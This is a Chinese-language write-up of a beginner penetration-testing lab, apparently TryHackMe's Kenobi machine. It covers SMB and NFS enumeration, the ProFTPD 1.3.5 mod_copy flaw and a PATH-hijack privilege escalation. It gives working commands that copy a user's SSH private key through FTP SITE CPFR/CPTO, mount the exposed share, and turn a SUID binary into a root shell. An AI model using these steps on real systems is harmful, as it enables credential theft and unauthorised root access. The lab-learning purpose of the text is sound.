前言
一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。
知识点
可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。
samba
Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。
Samba基于服务器消息块 (SMB) 的通用客户端/服务器协议。SMB 仅针对 Windows 开发,如果没有 Samba,其他计算机平台将与 Windows 机器隔离,即使它们是同一网络的一部分。
SMB 有两个端口,445 和 139 FTP 运行在21端口 rpcbind 的端口 111。这只是一个将远程过程调用 (RPC) 程序号转换为通用地址的服务器。当一个 RPC 服务启动时,它告诉rpcbind它正在侦听的地址和它准备服务的 RPC 程序号。ProFtpd 是一个免费的开源 FTP 服务器。
Searchsploit 基本上只是一个针对exploit-db.com 的命令行搜索工具 SUID:用户访问级别的特殊权限具有单一功能:具有SUID的文件始终以拥有该文件的用户身份执行,而不管用户传递命令。如果文件所有者没有执行权限,则在此处使用大写的S /usr/bin/menu 菜单系统文件 。
操作步骤
nmap扫描目标(查看开启了多少端口):
nmap脚本枚举smb共享:
nmap -p 445 --script = smb-enum-shares.nse, smb-enumusers.nse 10.10.193.20(发现三个文件共享)
使用smbclient连接网络共享:
smbclient//ip/anonymous (列出共享的文件)
除了smbclient连接外,可递归下载 SMB 共享。
提交用户名和密码作为空:
打开共享上的文件,发现了一些有趣的事情:
为用户生成SSH密钥时为 Kenobi 生成的信息有关 ProFTPD服务器的信息
nmap枚举111端口(该端口此例中用于访问网络文件系统):
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.70.208
发现 /var 文件夹下文件:
使用netcat通过FTP端口连接机器,获取 ProFtpd 的版本
nc ip 21
使用searchsploit查找特定软件版本漏洞:searchsploit pro
根据ProFtpd 的版本找到了一个漏洞利用:mod_copy 模块。
详细:ProFTPd 1.3.5 - 'mod_ copy' Command Execution mod_copy 模块实现了SITE CPFR 和SITE CPTO命令,可用于将文件/目录从服务器上的一 个位置复制到另一个位置。任何未经身份验证的客户端都可以利用这些命令将文件从任 何复制 文件系统的一部分到选定的目的地。使用 SITE CPFR 和 SITE CPTO 命令复制 Kenobi 的私钥。
nc ip 21
SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa /var 目录是我们可以看到的挂载。所以我们现在已经将 Kenobi 的私钥移动到 /var/tmp 目 录。
将 /var/tmp 目录挂载到我们的机器上:
mkdir /mnt/kenobiNFS mount ip:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS
复制kenobi用户私钥,ssl连接
使用命令:find / -perm -u=s -type f 2>/dev/null 查找系统中suid bit权限的执行文件
输入以下命令,二进制文件在没有完整路径的情况下运行(例如,未使用 /usr/bin/curl 或 /usr/bin/uname)
/usr/bin/menu以 root 用户权限运行,我们可以操纵我们的路径获得一个root shell:
复制了 /bin/sh shell,将其命名为curl,赋予它正确的权限,然后将它的位置放在我们的路径中。这意味着当 /usr/bin/menu 二进制文件运行时,它使用我们的路径变量来查找“curl”二进制文件。这实际上是 /usr/sh 的一个版本,以及这个文件以root身份运行我们的shell。